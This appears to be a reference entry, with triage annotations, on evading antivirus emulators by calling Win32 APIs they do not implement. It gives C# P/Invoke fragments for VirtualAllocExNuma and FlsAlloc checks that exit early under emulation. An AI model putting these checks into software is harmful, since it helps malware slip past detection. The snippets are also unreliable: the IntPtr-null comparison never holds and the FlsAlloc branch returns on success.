Non-emulated APIs

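The technique aims to bypass AV emulators by calling Win32 APIs that the emulator does not implement. Under emulation these functions return an error or crash, which tells the code that it is running in a simulated environment rather than on a real host. Each check relies on a coverage gap in a particular emulator, so it stops working once the engine adds the API; importing a rarely used function and exiting right after the call is also a pattern that static and behavioural detections can match.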

Numa

// Fragment, not a compilable unit: the two extern declarations belong at class scope,
// the statements after them belong inside a method body.
//
// P/Invoke declaration for kernel32!VirtualAllocExNuma. Per the Win32 documentation it
// reserves or commits memory in the given process with a preferred NUMA node and returns
// NULL on failure. It is the probe call for this section.
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)]
        static extern IntPtr VirtualAllocExNuma(IntPtr hProcess, IntPtr lpAddress, uint dwSize, UInt32 flAllocationType, UInt32 flProtect, UInt32 nndPreferred);

        // P/Invoke declaration for kernel32!GetCurrentProcess; supplies the hProcess argument below.
        [DllImport("kernel32.dll")]
        static extern IntPtr GetCurrentProcess();

// Probe call against the current process: no fixed address (IntPtr.Zero), 0x1000 bytes,
// 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x4 = PAGE_READWRITE, preferred NUMA node 0.
IntPtr mem = VirtualAllocExNuma(GetCurrentProcess(), IntPtr.Zero, 0x1000, 0x3000, 0x4,
0);
            // Early-exit branch, taken when the comparison of the returned IntPtr with null holds.
            // Nothing in this snippet reads, writes or releases the allocation; the call exists
            // only for its return value.
            // NOTE(review): for triage, a managed binary that imports this API and bails out
            // right after a throwaway allocation is the observable pattern here - confirm
            // against the rest of the sample before treating it as an indicator.
            if (mem == null)
            {
                return;
            }

FlsAlloc

// Fragment, not a compilable unit: the extern declaration belongs at class scope,
// the statements after it belong inside a method body.
//
// P/Invoke declaration for kernel32!FlsAlloc, which allocates a fiber-local-storage index.
// The callback parameter is declared as a raw IntPtr rather than a delegate type.
[DllImport("kernel32.dll")]
        static extern UInt32 FlsAlloc(IntPtr lpCallback);

// Probe call with no callback (IntPtr.Zero). The returned index is never used afterwards
// and no FlsFree call appears in this snippet.
UInt32 result = FlsAlloc(IntPtr.Zero); 
            // 0xFFFFFFFF is FLS_OUT_OF_INDEXES in the Win32 headers. As written, the branch
            // returns early when result is any value other than 0xFFFFFFFF.
            // NOTE(review): for triage, an FLS index allocated with a null callback and then
            // discarded serves no functional purpose - confirm against the rest of the sample
            // before treating it as an indicator.
            if (result != 0xFFFFFFFF)
            {
                return;
            }
